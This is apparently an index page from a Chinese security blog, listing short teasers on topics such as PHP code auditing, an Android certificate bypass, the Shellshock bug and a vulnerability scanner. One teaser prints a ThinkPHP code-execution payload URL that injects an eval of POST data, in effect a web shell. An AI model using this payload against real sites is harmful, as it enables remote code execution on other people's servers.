最近有人用小站数据,利用反向代理技术,做了个小偷站。用户访问的是他的网址,但实质上内容数据确是我的,这是一起恶意反向代理事件。什么是反向代理?先说说正向代理的概念:正向代理,也就是传说中的代理,他的工...
Seay信息安全博客
PHP代码审计基础知识 对新手来说很精品哦 |
显示不全请点击全屏阅读 目录 1. 概述 3 2. 输入验证和输出显示 3 2.1 命令注入 4 2.2 跨站脚本 4 2.3 文件包含 5 2.4 代...
系统文档
IIS+FastCGI+PHP5.3+MySQL5.1+Gzip详细教程
说明:本帖是我经过一天一夜完成的,不同于一般网上文章,除详细的将整个配置过程和 测试过程都详细截图说明外,尤其在FastCGI方面采用微软的“web平台安装程序”来配置,网上相关内容很少,对gzip的...
Google Android证书链验证安全限制绕过漏洞
受影响系统:Google Android 2.1-4.4Google Android描述:-------------------------------------------------------...
Seay信息安全博客
飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行
显示不全请点击全屏阅读 第一个方法 直接执行 http://www.2cto.com/index.php?s=vod-search-area-${@print(eval($_POST))} .html...
系统文档
申请 AnyFastCloud 的免费 IPv6 VPS
在上篇文章中,我讲解了 2023 年末新开的一家云服务器提供商 —— HokoHost。经过了我的博客发布和论坛介绍了之后,不到 1 小时就把库存抢光了。这篇文章就来介绍另外一个提供商 —— AnyF...
Web Service入门
1. Web Service的定义 目前对Web Service没有统一的定义,定义一:Web Service是自包含的、模块化的应用程序,它可以在Web中被描述、发布、查找以及调用。定义二:...
帝国cms技巧
帝国CMS批量删除重复文章,仅保留一篇的sql语句
现象:用火车头采集的数据,经常有重复,数据有近40w,需要删除所有新闻表中重复的文章,然后只保留一篇,帝国cms有提供这个功能,但数据较大,点击 查询重复标题A 会出现卡死超时的现象,需求...
神兵利刃
WyAtu之Perun漏洞扫描器
下载地址:https://github.com/WyAtu/Perunpython Perun.py -l . --all-list显示所有的poc python Perun....
业界关注
破壳漏洞(CVE-2014-6271)综合分析:“破壳”漏洞
一、威胁卡片 二、概述 2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室安全研究与应急处理中心(以下简称:安天CERT)第一时间根据信息研判,确认该漏洞可以产生严重的后果,且分布广泛...
